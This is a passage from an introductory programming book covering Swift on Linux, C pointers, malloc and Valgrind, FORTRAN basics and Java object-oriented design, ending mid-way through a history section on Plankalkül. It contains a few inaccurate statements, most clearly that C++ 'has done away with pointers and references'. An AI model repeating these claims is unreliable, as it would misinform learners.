actually still Objective-C. Next we need to adjust the environment variables.
First check your current PATH settings with
echo $PATH
Now let's change this path with the command
export PATH=/home/username/Swift_3.0/usr/bin:$PATH
Note the location of the directory where you placed your Swift installation.
Of course you should also change username. If you use echo $PATH again you
will notice it has been changed. Now you are set to Swift! With
swift --version
we confirm everything is properly installed.
Swift version 3.0-dev (LLVM b361b0fc05, Clang 11493b0f62, Swift 24a0c3de75)
Target: x86_64-unknown-linux-gnu

Testing REPL
Swift comes with its own interactive shell like Python, called the REPL. By
just typing swift into Terminal you gain access to it. In the REPL you can
quickly run some code when you need to. Let's do a test. Type the following
into the REPL.
1> var welcome = "Hello, world!"
The REPL tells us the String value is assigned to welcome.
2> print(welcome)
With the print command we simply print out the string to the REPL interface.
Note how we assigned the value to a var. We could also have used let, but then
we could not change the value afterwards. A let is a constant; it is immutable.
That's enough for the REPL. Let's write a proper test application.

Creating an application
For our Swift test application we will set up a proper folder.
mkdir HelloSwift
Inside this directory we create a file called Package.swift which every Swift
package must have.
touch Package.swift
Next we create a Sources folder
mkdir Sources
Every Swift application must have a file called main.swift inside Sources.
This will start the application.
touch Sources/main.swift
The only thing left to do is alter main.swift with your favorite text editor. Add
the following lines to read input from Terminal (Swift 3 renamed the argument
label of readLine from stripNewline to strippingNewline).
let response = readLine(strippingNewline: true)
print(response)
Now we only need to compile the code with the command
swift build
Now we can run the program. Inside the HelloSwift folder run the following
command
.build/debug/HelloSwift
With the readLine function the program will stop until the user has pressed
Enter. If you input Hello, World! and press Enter you will see the string
printed to the console. readLine is from the Swift Standard Library and as
such does not require any specific import. The list of standard functions is
what you would expect: swap, sizeof, min, max, assert and of course print.
Below is a more lengthy coding example. If you can fully understand it then
you know both the basics of programming and of Swift. But first copy and
paste the code, then compile and run it to follow the tutorial.
import Foundation

print("Hello to this basic Swift script")
print("Would you like to proceed with a tutorial on Swift? Yes or No?")

// readLine returns an optional String; it is nil when no more input is available
var response = readLine(strippingNewline: true)

var runTutorial: Bool
repeat {
    if response == "Yes" || response == "yes" || response == "Y" ||
        response == "y" {
        print("Conditional statements are similar to Java")
        print("You can use the || and && to chain conditions together")
        runTutorial = false
    } else if response == "No" || response == "no" || response == "N" ||
        response == "n" {
        runTutorial = false
        print("This tutorial will now end")
        exit(0)
    } else {
        runTutorial = true
        print("Incorrect input! Choose [Y]es or [N]o")
        print(response ?? "")
        // ask again, otherwise the loop would repeat the same wrong answer forever
        response = readLine(strippingNewline: true)
    }
} while runTutorial

print("For loops are simple. In Swift they iterate over a range or a collection")
print("Note: the C-style initialization; condition; increment form and ++ were removed in Swift 3")
for _ in 1...10 {
    print("I love Swift")
}

print("Classes are also similar to Java. You initialize a class object calling the init function")
let s = Rectangle(base:5, height:6)
print("And you can use class functionality using the object.function() call format.")
print("Example: the area of the rectangle is \(s.area()).")

As Swift focuses heavily on Object-Oriented programming there is also a
small class defined that calculates the area of a rectangle. Again, if you're
familiar with Java or Python all this will look familiar.
/*
 * A simple Swift class for Linux!
 */
class Rectangle {
    var base:Int
    var height:Int

    init(base:Int, height:Int) {
        self.base = base
        self.height = height
    }

    func area() -> Int {
        return self.base * self.height
    }
}
Essentially Rectangle is a user-defined type, like Int and Bool. It has two
variables, an initializer used to first set it up and user-defined
functionality. This one function, area(), calculates the area of the rectangle.
Swift on Linux is still under development; the Foundation package still needs
a lot of work, but it is getting there. Swift is an exciting new programming
language. If you want to develop a new skill that is bound to be relevant you
can do worse than picking Swift. Enjoy!
Source: http://itsfoss.com/use-swift-linux/

Chapter 3 C memory management and pointer variables

Memory management
If you are familiar with programming languages you will know that C is very
popular. It contests the top spot with Java and if you include its derivative
languages such as C++ and C# it is really no contest. C is efficient; of all
the programming languages it is relatively low-level, meaning you have to
program every tedious issue yourself. Oddly enough, when C was introduced it
was criticized for being too high-level, especially in comparison to Assembly
language. Yet C is much easier to write and despite some critics it is very
efficient. To get the most out of it you will have to use memory pointers and
references, the single greatest stumbling block for C novices. C++ has done
away with pointers and references, but as it is backwards compatible with C
many programmers continue to use them. So let's start with a brief overview.
We begin with a simple program that creates an integer variable, stores some
value inside it and prints this out. If you need to remember how to compile
the code see chapter 4, paragraph 4 Introduction to programming.

#include<stdio.h>
int main() {
    int randomValue;
    randomValue = 12345;
    printf("%d\n", randomValue);
    return 0;
}

In this example we refer to the variable randomValue by its name. Your
computer will access its RAM (Random Access Memory) and allocate a space
to store this variable. RAM is divided into bytes, each of which consists of
eight binary digits (zeros and ones). Afterwards a value is assigned to
randomValue and lastly we use printf to print the value to Terminal. In this
case %d denotes where the value needs to be printed, just before the carriage
return \n. A variable such as the integer randomValue may need more than one
byte to store its value. That depends on what type of variable it is. In C, a
simple integer value on a 64 bit system will take up 4 bytes[5]. You can
easily check this with the following program.

#include<stdio.h>
int main() {
    int value = 12;
    int sizeofvalue = sizeof(value);
    printf("%d\n", value);
    printf("%d\n", sizeofvalue);
    return 0;
}

Other variable types have different sizes. The following program checks some
of the most popular primitive types found in C.

#include<stdio.h>
int main() {
    int value = 12;
    int sizeofvalue = sizeof(value);
    printf("Size of int is: %d bytes\n", sizeofvalue);

    double d = 2.1;
    int sizeofd = sizeof(d);
    printf("Size of double is: %d bytes\n", sizeofd);

    float f = 55.7;
    int sizeoff = sizeof(f);
    printf("Size of float is: %d bytes\n", sizeoff);

    char c = 'A';
    int sizeofc = sizeof(c);
    printf("Size of char is: %d bytes\n", sizeofc);
    return 0;
}

This program reveals that doubles occupy 8 bytes in memory, floats 4 bytes
and chars just 1 byte. Chars, or single characters, are encoded using the
ASCII system which consists of 128 characters in total. About 30 are now
obsolete. If you look at the ASCII table you will find that each character
has a binary notation, a decimal and a hexadecimal notation. Each of the C
primitives can be printed with printf; for int (which we have used so far) it
is either %d or %i. For chars it is %c, but if you were to print one out using
%d you would get its ASCII number!
Going back to memory addresses, we now know the size primitive types take
up in memory. Every time we create a variable and put a value in it we create
a box in memory. This box contains a value which can be accessed by using the
variable name. However, in C we can also refer to a variable by its memory
address instead of its name.
This feature becomes handy when we want to alter a variable inside a function,
just as we would do with Python. In fact, we cannot do it properly in C without
a memory address. If we used the variable name, the function merely copies
the value into new variable (with the same variable name) and alters that
variable! What we want from the function is it to change the variable value, not
just copy it. I will illustrate this subtle difference with a very common
programming example: the swap function.

The program below is larger than any other C program we have written, so
bear with me.

#include<stdio.h>

void swap(int, int);
void swapWithReference(int*, int*);

int main() {
    int a = 2;
    int b = 4;

    swap(a, b);
    printf("The value of a is %d and the value of b is %d\n", a, b);

    swapWithReference(&a, &b);
    printf("The value of a is %d and the value of b is %d\n", a, b);
    return 0;
}

void swap(int a, int b) {
    int temp;
    temp = b;
    b = a;
    a = temp;
}

void swapWithReference(int *a, int *b) {
    int temp;
    temp = *b;
    *b = *a;
    *a = temp;
}

The code above contains two versions of swap. Both functions are written
outside of the int main {} section. To make C understand they exist we write
stubbed versions (prototypes) as the second and third lines.
Inside main we create two variables, int a and int b, which we give the values
2 and 4. We call both versions of swap, yet only one does what it is supposed
to do and that is swap both numbers around. The issue is that the function
swap() merely receives the values of a and b. Once inside, the function swaps
the two integer values but they are newly created variables that live only for
the duration of the function. They have what is known as a local scope and are
destroyed as soon as the function ends. In effect, swap() does nothing.
The second function swapWithReference() instead receives the memory
addresses of variables a and b. This is done by placing the ampersand &
before the variable in the function call. Inside the function the variables are
first dereferenced. Whereas a and b would still refer to memory addresses, *a
and *b do not. In essence the function swapWithReference() does the following
1. Create an integer variable temp
2. Place whatever is in *b in temp
3. Place what is in *a in *b
4. Place what is in temp in *a
It is important to note that even though variables a and b are dereferenced
they still refer to a specific memory address. In essence if we talk about *a we
are saying 'the value 2 that is at memory address XYZ'. And so with the
addition of two print statements we can find out if the values in the variables
have indeed been swapped.
The value of a is 2 and the value of b is 4
The value of a is 4 and the value of b is 2

If you want to you can actually print out the value of the memory addresses for
variables a and b. Just add the following line to the program.
printf("The memory address for a and b is %p %p\n", &a, &b);

The additional output is then
The memory address for a and b is 0x7ffca0ad56a0 0x7ffca0ad56a4
Although the actual memory addresses when you run this program will be
different.
This was the basics of C pointers. It can be tedious to learn if you're a
novice. Using print statements liberally can be a solution, but a better initial
response would be to just trace the code with a pencil and paper. What I have
glossed over is that you can have a dedicated pointer variable that will store
the reference to a specific memory block. Going all the way back to the
randomValue example we can create such a pointer variable by adding the
following lines beneath the printf statement.
int * mem = &randomValue;
printf("%p\n", (void *) mem); // use %p to print out a pointer value; %p expects a void *

Now we have created a pointer variable named mem that stores the location of
randomValue, which is an integer variable. Using such pointer variables can in
practice speed up programs. Pointer variables have a special syntax; we have
already seen some of it with the function swapWithReference().
<pointer type> * <pointer name>;
In our example of mem the pointer type was an int, because mem stored a
reference to an integer variable. So for each type of primitive variable (int,
char, float etc.) its corresponding pointer variable needs to be of the same
type, just with an asterisk behind it[6].
If we have a pointer variable and we want the value at the address it is
pointing to we can use the asterisk to get it. The asterisk is then used as the
'value of' operator, which I showed in swapWithReference().
char oneletter = 'j';
char * point_to_oneletter = &oneletter;
char readChar = *point_to_oneletter;

The example code above illustrates this. The first line creates a char variable
oneletter and assigns the letter j to it. The second line creates a pointer
variable point_to_oneletter of type char, and with the ampersand character we
assign the memory address of oneletter into the pointer. Finally, with the third
line we reverse this. We create a new char variable and with the asterisk
retrieve the value of the variable pointed to by point_to_oneletter. Thus the
‘value of’ operator * does the exact opposite of the ampersand &. Now the
circle is complete.

Malloc
Up to now we have created primitive variables and stored simple values.
However, with large applications it is often unclear how much memory we
will need, and creating a new variable, be it a char or an integer, for each
new value would be overkill. With the malloc (memory allocation) function we
can assign as much memory to a variable as the system will allow. An example
that allocates a megabyte is as follows.

#include<stdio.h>
#include<stdlib.h>

int main() {

    char * lots_of_memory;
    lots_of_memory = (char *) malloc(1024*1024);
    free(lots_of_memory);
    return 0;
}

There are three things to note. The first is that we needed to include an extra
header file for the stdlib library; only then can we use malloc. The function
malloc has return type void *, so we cast it specifically to the variable type
we want, in this case (char *). Last but not least we need to free the memory
once we no longer use it. Be aware that malloc returns NULL when the system
cannot supply the requested memory, so a real program checks the returned
pointer before using it.
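Added example (not the book's code) tying the ampersand, the asterisk and malloc/free together: the caller's pointer is passed by its address, so one function can allocate into it and another can free it and reset it to NULL, the usual guard against using a pointer after it has been freed; the bounded copy shows the same idea for writing into a fixed-size buffer. All function names here are invented for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example (not from the book): allocate, fill and release a buffer
 * through pointer-to-pointer parameters. Function names are invented.
 */

/* Allocate a zero-filled buffer of n bytes and hand it back through *out.
 * Returns 0 on success, -1 if malloc fails or the arguments are bad.
 * Because out is the ADDRESS of the caller's pointer, the assignment
 * *out = ... changes the caller's variable, just like swapWithReference. */
int buffer_alloc(char **out, size_t n)
{
    if (out == NULL || n == 0)
        return -1;
    char *p = (char *) malloc(n);
    if (p == NULL)             /* always check: malloc can fail */
        return -1;
    memset(p, 0, n);
    *out = p;
    return 0;
}

/* Copy src into a buffer of capacity cap, always leaving a terminating
 * NUL. Returns the number of characters copied, or -1 if src did not fit
 * (the content is truncated instead of running past the buffer). */
int buffer_fill(char *dst, size_t cap, const char *src)
{
    if (dst == NULL || cap == 0 || src == NULL)
        return -1;
    size_t len = strlen(src);
    if (len >= cap) {
        memcpy(dst, src, cap - 1);
        dst[cap - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return (int) len;
}

/* Free the buffer and reset the caller's pointer to NULL, so a later
 * accidental use fails loudly instead of reading freed memory. */
void buffer_release(char **p)
{
    if (p == NULL)
        return;
    free(*p);                  /* free(NULL) is a harmless no-op */
    *p = NULL;
}

/* Walk through one complete lifecycle. Returns 1 if every step behaved
 * as expected, 0 otherwise. */
int buffer_demo(void)
{
    char *buf = NULL;
    if (buffer_alloc(&buf, 8) != 0)              /* &buf: address of our pointer */
        return 0;
    if (buffer_fill(buf, 8, "pointer") != 7)     /* 7 chars + NUL fit in 8 bytes */
        return 0;
    if (strcmp(buf, "pointer") != 0)
        return 0;
    if (buffer_fill(buf, 8, "references") != -1) /* 10 chars do not fit */
        return 0;
    if (strcmp(buf, "referen") != 0)             /* truncated, still terminated */
        return 0;
    buffer_release(&buf);
    return buf == NULL;                          /* the caller's pointer was reset */
}

int main(void)
{
    printf("lifecycle %s\n", buffer_demo() ? "ok" : "failed");
    return 0;
}
```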

Memory leaks and Valgrind
A clever little command line tool developed by Julian Seward, called
Valgrind, is able to uncover memory leaks in programs. If you don't have
Valgrind installed, just use the following command
sudo apt-get install valgrind
We can test the program by replacing the following lines of code
lots_of_memory = (char *) malloc(1024*1024);
free(lots_of_memory);
with
lots_of_memory = (char *) malloc(1024);
lots_of_memory = 0;

The first line allocates a smaller portion of memory to the variable (just 1024
bytes). The second line orphans the allocation by overwriting the pointer with
0. Thus there is NO pointer variable pointing to the 1024 allocated bytes. If we
compile the program into one named memory we can show that. Using the
following Valgrind command we get a very lengthy stream of output that says
just that.
username@ubuntu:~$ valgrind --leak-check=yes -v ./memory
==87586== 1,024 bytes in 1 blocks are definitely lost in loss record 1 of 1
==87586==    at 0x4C2BBCF: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87586==    by 0x400547: main (in /home/username/memory)

With Valgrind we can thus easily debug C code that might contain memory
leaks. It earned Seward the 2006 Google-O'Reilly Open Source Award for his
work.

Conclusion
C memory allocation has many subtleties that can take a while to understand.
With most simple C programs you don't need to bother with pointers, and so it
is up to you to learn to use them when you think it is suitable. Below is a C
program that determines how much free memory you have on your PC. It is a
good example of C. Play around with it. If you feel confident then check out
Kernighan and Ritchie's (K&R) The C Programming Language, recently
republished in eBook format.

#include<stdio.h>
#include<stdlib.h>

int main() {

    char name[20];
    int value;

    printf("Enter your name: \n");
    scanf("%19s", name);   /* %19s: read at most 19 characters so the 20-byte buffer cannot overflow */
    printf("Welcome: %s\n", name);

    printf("Do you want to determine how much free memory you have?\n");
    printf("Input 0 for no or 1 for yes\n");
    scanf("%d", &value); // pass by reference

    if (value == 1) {
        char * memory;
        int kilobytes;
        int megabytes = 0;   /* must be initialised before it is incremented */
        /* The blocks are deliberately never freed: the program measures how
           much it can grab before malloc returns NULL. On Linux, memory
           overcommit may let it run a long way before that happens. */
        while(1) {
            for (kilobytes = 0; kilobytes < 1024; kilobytes++) {
                memory = (char *) malloc(1024);
                if (memory == NULL) {   /* the system has no more memory for us */
                    printf("Out of memory after %d megabytes\n", megabytes);
                    return 1;
                }
            }
            megabytes++;
            printf("Amount of memory allocated is: %d\n", megabytes);
        }
    } else if (value == 0) {
        printf("In that case, Goodbye!\n");
    }
    return 0;
}

FORTRAN Programming Tutorial


This extra chapter is a small detour intended to raise your awareness of other,
older programming languages. FORTRAN in particular is still of interest.
FORTRAN was first released in 1957 and was developed by John Backus. The
latest version, FORTRAN 2008, is still going strong and the small revision,
FORTRAN 2015, is scheduled to be released in 2018. FORTRAN
remains particularly popular in the scientific field.
The first FORTRAN program we code is the ubiquitous Hello, World! As you
can see from the code below, comments begin with the bang ‘!’ and each
program has an opening and a closing line which mention the program name. In
this case the name is helloworld. Be careful as FORTRAN is case sensitive.

! Hello, world! in FORTRAN
program helloworld

  print *, "Hello World!"

end program helloworld

To compile the program we can use gfortran, the GNU supplied open source
compiler. If it is not installed on your system use sudo apt-get install gfortran.
Other than that the syntax to compile is similar to gcc. This will compile the
source code into a program called helloworld.

gfortran helloworld.f08 -o helloworld
./helloworld

A second and far more interesting program calculates how fast a particle sinks
through a fluid. Try to get a basic feel for the syntax. It’s not all that
different from other languages, is it?

! This is a simple FORTRAN example program
program particle
  implicit none

  real :: rho_s = 2.7 ! particle density
  real :: rho_l = 1.0 ! water density
real :: D = 0.01 ! particle diameter
real :: g = 981 ! acceleration due to gravity
real :: n = 0.01 ! viscosity

real :: v ! velocity (to be calculated)

v = ((rho_s - rho_l)*(D**2)*g) / (18*n)

print *, v

end program particle

The third and final program will display the important syntax necessary to
build a fully functional program. With the built-in read statement we accept user
keyboard input, in this case an integer value. The asterisk * that follows is
called a unit identifier and is a necessity.

The conditional statement, if-then-else, is easy enough to understand and is
similar to most other programming languages. Note the endif keyword that
closes the conditional. This is mandatory; an ‘else + statement’ block is not.
The do-while loop will iterate until the user types the integer 1 in the terminal,
which sets the logical variable check to false. Notice the difference between a
while-loop and a do-while loop. The do-while is guaranteed to run through the code
inside the block at least once.

program userinput
  implicit none
  integer :: anything
  logical :: check      ! implicit none requires every variable to be declared
  check = .true.

  print*, 'Input an integer from the keyboard'
  read*, anything

  if (anything >= 10) then
    print*, 'Value is 10 or greater'
  else
    print*, 'Value is less than 10. It is ', anything
  endif

  do while (check)
    print*, 'This is a simple FORTRAN program'
    print*, 'Type in integer 1 to agree'
    read*, anything

    if (anything == 1) then
      check = .false.   ! logical constants need the closing dot
    endif
  end do

end program userinput

Despite FORTRAN’s continuing popularity in science, alternatives do exist. A
recent addition has been Julia. It combines efficient numerical and floating
point operations with extensive libraries for general-purpose programming and
web use. I don’t think FORTRAN will go away any time soon, but the
alternatives will come to dominate the scientific field.

Chapter 4 Object-Oriented design with Java

Object-Oriented Programming
Readers of this book who take an interest in the wider IT world may have
heard of Object-Oriented Programming, or OOP. Whereas the first chapter of
part 2 of this book dealt with the basics of programming, control structures
and syntax, this chapter deals with organizing code better. As you may guess,
it is organized into Objects. After you finish part 2 on programming you
may decide to continue to hone your programming skills. Perhaps you are
looking for a new line of work. Learning about Java and OOP is an excellent
idea. Both are popular in the business world: the simple syntax and the ability
to organize code the way business people think has made both popular.

Java
The Java language, which is at this moment the most popular in the world, was
designed by James Gosling in 1995 at Sun Microsystems. It is heavily
influenced by C, but Gosling wanted to make that language simpler to use. Java
makes extensive use of libraries, thus removing the need to type the nitty-gritty
details of many applications. Java also has automatic garbage collection:
unused memory is automatically given back to main memory. Last but not least,
Java can run on pretty much any computer without the need to recompile the
code for that computer. So if I compile my Java code on Windows the
compiled code can also run on Linux, or on an ARM based computer. The caveat
is that those other systems must also be able to use the Java Virtual Machine,
normally contained in a JRE (Java Runtime Environment). Code in Java is not
compiled from source to machine code; instead it is compiled into object code.
The JVM transforms this code to machine code at the start of a Java program,
in real time; there is no separate compile step to wait for. This has advantages and
disadvantages. The advantage is that object code can run anywhere, as
explained. The major disadvantage is that Java can be slower than other
languages, especially C. However, with the introduction of the Java Just-In-
Time compiler (JIT) the major speed disadvantages have disappeared, leaving
Java faster than many other languages except C.

Hello World! Again!
So let’s start with a simple HelloWorld example. With Gedit open a file named
HelloWorld.java and type in the following lines of code

public class HelloWorld {
    // start of the program
    public static void main(String[] args) {
        System.out.println("Hello World!"); // print statement
    }
}

In the first line we define a class. Java does everything with classes. It is a
simple way to divide code into organized places. The third line, beyond the
comment, is the official start of the program. Every Java program needs to
have a public static void main method, otherwise the computer would not know
where to start the program. It is similar in nature to C. The final line of code
prints the now familiar phrase ‘Hello World!’ on a new line. System.out is a
built-in Java package used for printing to standard output, the command line.
The next step is to compile the program into object code. For that you will
need to install the Java SDK. A standard version would be Java SE 8. To test
whether you have installed it properly type javac -version into the command
line. Output should be something like javac 1.8.version_number. You can now
compile the code with the command
username@ubuntu:~$ javac HelloWorld.java
With ls you should see that there is now also a file called HelloWorld.class.
This is the object code file that can be exported to any system, be it Windows,
Linux or Mac. To run the class file you need to have the Java Runtime
installed. Type java -version to check. If the output finds a JRE you are all
set. Now you can run the object code. Type in
username@ubuntu:~$ java HelloWorld
and your output should be Hello World!

Objects
So what is an Object? To put it bluntly, it is a custom made variable. You
already know some programming languages have variables such as integers,
floats and strings, but you have not dealt with the possibility that things in this
world, around us, may not be easily defined by any of them. As an example,
take your own identity. If you write a program to store and manipulate
identities you have to deal with names, age, place of residence etc. Each can
be defined with a classic variable that I just mentioned, but only taken together
are they truly an identity. What if you could take all three variables and place
them in a variable called Identity? They would be where they belong, with no
fear of causing spaghetti code as you try to maintain endless records of people
who each may have dozens of variables. We now use Identity as an object. In
Java we deal with classes; each class is a blueprint for an object. If I want to
change the name of a person I change it using suitable methods found in that
class. This way what truly defines an Identity is not just the variables
but also the functionality given to the Object by its methods. I know what I just
explained may be overwhelming, so let me show you.
First off, we need a class that can start the program. The code you see below
will suffice; I called it StartApplication. It contains the line public static void
main, which some have called the GodMethod because it is where the entire
program sequence begins. After the start, the first true line of the program is
line 3. See how it creates an instance of a new variable of type Hotel. The
instance is called hotel. This is similar to creating an instance of String with
String string = ""; That said, String is built in as it is part of Java and already
defined, but our program below has no idea what a Hotel is.
public class StartApplication {
public static void main(String[] args) {
Hotel hotel = new Hotel("Fawlty Towers", "Basil and Sybil");
hotel.run();
}
}
Java will look in the same directory for another class file called Hotel.java

public class Hotel {
    String name = "";
    String owner = "";
    int numberOfRooms;
    boolean isOpen;

    public Hotel(String name, String owner) {
        this.name = name;
        this.owner = owner;
        this.numberOfRooms = 26;
        this.isOpen = true;
    }

    public void run() {
        while (isOpen == true) {
        }
    }
}

The first piece of code creates a Hotel instance, but on the right side it also
does something strange. The section new Hotel("Fawlty Towers", "Basil and
Sybil"); may seem alien at first, but what it essentially does is pass along two
strings in the creation of hotel. Now our unique variable Hotel already has two
interesting details, a name and an owner. Both strings were passed on to what
is known as the Constructor. The constructor is always named the same as the
class, but without the word class before it. The constructor is passed two
strings, name and owner. It is up to the programmer to understand what they
mean. We place both values into global variables that are similarly named, but
that is not necessary. The variables could have been called cat and mouse but it
wouldn’t make much sense. Yet the constructor does more. After it assigns the
two strings to the global variables it also sets the integer variable
numberOfRooms to 26 and the Boolean isOpen to true. The constructor in
essence creates an instance of the Hotel variable. Some arguments were passed
along, but two were hard-coded. This should already indicate that Objects have
the potential to be far more versatile than ordinary variables.

Now that the hotel instance was created the program can move to the second
line. Remember I said you can assign functionality to an object. Well, in the
class file Hotel we have a method called run. Only hotel instances can run this
method and we have just created one. We call the method run on line 4 of the

previous code section. Afterwards the program ends. So if we want to give our
little example any kind of functionality it has to happen in method run. Below
is an extended section of the method plus an additional method that is called.

// Hotel.java needs "import java.util.Scanner;" above the class for this to compile
public void run() {
    while (isOpen == true) {
        Scanner user_input = new Scanner(System.in);
        System.out.print("Should Basil close the hotel? Yes or No! ");
        String decisions;
        decisions = user_input.next();

        if (decisions.equals("Yes")) {
            closeHotel();
            System.out.println("The hotel will be closed");
        }
    }
}

public void closeHotel() {
    this.isOpen = false;
}

You may already guess what it does. The while-loop in run will last until the
Boolean isOpen is set to false. We are going to try to do that by asking for input
from the user. The first line in the loop creates a Scanner Object called
user_input. It is created by sending the argument System.in into its constructor.
Don’t worry about memorizing all this. I usually look at previous code
examples that I have written. You can do that as well. The next interesting line
is decisions = user_input.next(); this asks for user input and places it into
the String called decisions. Next we have a conditional statement that checks if
our input is equal to the String Yes. If the user filled in anything else,
even nonsense, it would never evaluate to true. If the user has input Yes the
conditional statement is entered and the method closeHotel is called. This
method should also be part of the class Hotel. All it does is switch the Boolean
value isOpen around. We could also have called the method from the other class
where we have a Hotel instance called hotel, because the method is public. If the
method is set to private instead then it can only be called from within the class
itself. So Objects have properties that are more than just variables; they also
have functionality.
Note that we have written two classes. You must compile both files; use
javac *.java to compile all Java source files. However, only the object code for
StartApplication needs to be called to start the application, as it contains the
GodMethod.

Overloading
Now that you understand that all Java classes are blueprints for Objects, the
sticky issue arises of what to do if a method already exists, but you do not have
exactly the right input to use it. For example, you asked a user for their age
but instead of storing the value in an int you have used a String.
With method overloading you can write different versions of the same method
suitable for different types of input. The example below illustrates how I want
to perform calculations on my bank account, but instead of double values I
also want to use non-decimal int values. To overwrite my current balance I
can write two methods.

public void newBalance(int balance) {
    this.balance = balance;
}

public void newBalance(double balance) {
    this.balance = (int) balance; // cast the double to int; the decimals are discarded
}

The advantage is that if another part of the program which I do not have control
over (not unusual in large programming applications) gives me either a double
or an integer, I do not have to change my code. I have to call the method
newBalance just once and either version will be called depending on what the
input value is. This takes complexity out of my hands. In fact, it is also
possible to overload Constructors. If I have either a double or an integer
value and I want to open a new bank account I can write two constructors.

Polymorphism
A related issue to overloading and overriding is polymorphism. What this
means is that certain parts of the code will accept different types of Objects as
long as they are related. Which particular Object a piece of code will receive
is not decided at the moment it is written, but at run-time. As an example, a
person can be male or female (leaving out third gender for clarity). If you’re
using the program and it asks for your gender, it can create a gender object
that is either male or female. Instead of using control statements to decide
what to do in either case you can just pass the object to where you want it to
go. For both to be interchangeable they need to be subtypes of a class that
the program accepts. You can imagine that organizations and businesses prefer
Object design as it allows them to clearly demarcate functionality. At times it
does become more complex.
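As an added example that is not from the book, the program below puts the overloading of the previous section and the polymorphism of this one side by side: Account has overloaded constructors and an overloaded deposit method, while chargeMonthlyFees accepts any Account subtype and lets the object's real class decide which monthlyFeeCents runs. All class and method names are my own invention, and the balance is kept in whole cents so that deposit(double) rounds instead of truncating the way a plain (int) cast does.

```java
import java.util.ArrayList;
import java.util.List;

// Added example, not from the book. All names are invented for illustration.
// The balance is kept in whole cents in a long, so deposit(double) can round
// instead of throwing the decimals away as a plain (int) cast would.
class Account {
    private final String owner;
    private long cents;

    // Overloaded constructors: open an account with an int, a double, or no amount.
    Account(String owner) {
        this(owner, 0);                 // an int literal picks Account(String, int)
    }

    Account(String owner, int dollars) {
        this.owner = owner;
        this.cents = dollars * 100L;
    }

    Account(String owner, double dollars) {
        this.owner = owner;
        this.cents = Math.round(dollars * 100);
    }

    // Overloaded method: the compiler picks the version by the argument's static type.
    void deposit(int dollars) {
        cents += dollars * 100L;
    }

    void deposit(double dollars) {
        cents += Math.round(dollars * 100);
    }

    void charge(long feeCents) {
        cents -= feeCents;
    }

    // Subtypes override this; a plain Account charges nothing.
    long monthlyFeeCents() {
        return 0;
    }

    String describe() {
        return String.format("%s (%s): $%d.%02d",
                owner, getClass().getSimpleName(), cents / 100, cents % 100);
    }
}

class SavingsAccount extends Account {
    SavingsAccount(String owner, double dollars) {
        super(owner, dollars);          // a double picks Account(String, double)
    }
    // No fee: the inherited monthlyFeeCents() already returns 0.
}

class CheckingAccount extends Account {
    CheckingAccount(String owner, int dollars) {
        super(owner, dollars);          // an int picks Account(String, int)
    }

    @Override
    long monthlyFeeCents() {
        return 250;                     // $2.50 per month
    }
}

public class BankDemo {
    // Polymorphism: the parameter type is Account, but each element may be any
    // subtype. Which monthlyFeeCents() runs is decided at run-time by the
    // object's real class, with no if/else on the type anywhere in this method.
    static void chargeMonthlyFees(List<Account> accounts) {
        for (Account a : accounts) {
            a.charge(a.monthlyFeeCents());
        }
    }

    public static void main(String[] args) {
        Account basil = new Account("Basil");
        basil.deposit(10);     // int literal: deposit(int)
        basil.deposit(0.99);   // double literal: deposit(double)
        basil.deposit(5L);     // a long cannot narrow to int, so Java widens it to double: deposit(double)

        List<Account> accounts = new ArrayList<>();
        accounts.add(basil);
        accounts.add(new SavingsAccount("Sybil", 100.50));
        accounts.add(new CheckingAccount("Manuel", 20));

        chargeMonthlyFees(accounts);
        for (Account a : accounts) {
            System.out.println(a.describe());   // one line per account, fee already deducted
        }
    }
}
```

Compile all three classes from the single file with javac BankDemo.java and run it with java BankDemo; only the checking account ends up paying a fee, even though the loop never asks which kind of account it holds.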

Conclusion
Arguably this chapter is more abstract than the others. Object-Oriented design
can take a while to fully understand properly. Yet the most important lesson to
learn is that you as the programmer can create any kind of variable you want.
That variable can be built out of either primitive Java variables such as String
and int but also out of other user defined variables. Each variable can
additionally contain any user defined functionality by defining methods in the
variable’s class file. After this arguably difficult chapter I have a special lengthy
detour past several Computer Science topics in the next, extra, chapter.

A brief history of programming languages

The oldest programming language
Generally speaking COBOL, Lisp, and FORTRAN are considered the oldest
programming languages still in widespread use. Each has been altered
significantly since its inception during the late 50s. Remember, COBOL came
about because FORTRAN was considered to be lacking in portability features.
Nonetheless, older programming languages do exist. The exact criteria that
define what a programming language is are open to debate, but it should at least
provide a layer of abstraction over the computer and the machine language that
runs on it. The late 50’s saw a lot of new languages; some would transform into
COBOL (COMTRAN) or were a forerunner of it (FLOW-MATIC). Another major
programming language was Lisp, created in 1958 by John McCarthy, which
found its niche in research into Artificial Intelligence.

Figure 43. Konrad Zuse

However, the very first acknowledged high-level programming language is
Plankalkül, designed by the legendary computer scientist Konrad Zuse between
1945 and 1948. Zuse had worked in Germany during the Second World War on
a computer series (Z2 to Z4) that was in many ways more advanced than those
designed by Alan Turing. After the bombing campaign of the RAF destroyed
all of his equipment in several large air raids, Zuse had to stop his work. He
took the opportunity of the post-war period to write his thesis on the concept of
high-level programming languages. Plankalkül has widely been cited as an
influence during the 50’s and subsequent decades on languages such as ALGOL,
but it remained a theoretical programming language relying heavily on
mathematical concepts such as Relational Algebra.

So how does PlanKalkul work?
Just like with modern programming languages the program is broken up into
smaller components. Each performs a calculation. Such blocks are called plans
and when chained together form a program. Each plan has input variables. V
variables form the input and are read-only. Z variables are used as
intermediary storage. R variables are used to declare the result variables.
Every plan is preceded by what was referred to as a ‘Randauszug’, which
defined the number of input and output variables as well as their type. If for
example Plan 1 has output variable R0 (we start at 0 of course) and we want to
use this as input for Plan 2, then the Randauszug for Plan 2 would be as follows:

R01(V0) => R0

We have now defined both the input and output variables for Plan 2 and show
the origin of the input variables with the 1 behind R0. Plan 1 and Plan 2 are
thus also chained together.

Zuse also used a very strange programming notation for PlanKalkul. It is a
two-dimensional notation, as seen below. The columns denote each variable.
The row V describes the variable name, so here Z4 and Z2. The last row, S,
denotes the type of the variable. In this case it is a single bit, called a ‘Ja-
Nein-Wert’. The row marked K contains the component index. In this case Z4 refers
to component 3 of component 2 of variable Z4.

     Z    Z
V    4    2
K    2.3
S    0    0

The data structures in Plankalkul are very elementary. It contains only one
primitive value, the single bit, denoted as S0. All other variables are derived
from the single bit. An array of bits is represented as n x 0. An array of arrays
would thus be m x n 0. We can also create a tuple, or list, of single bits. With
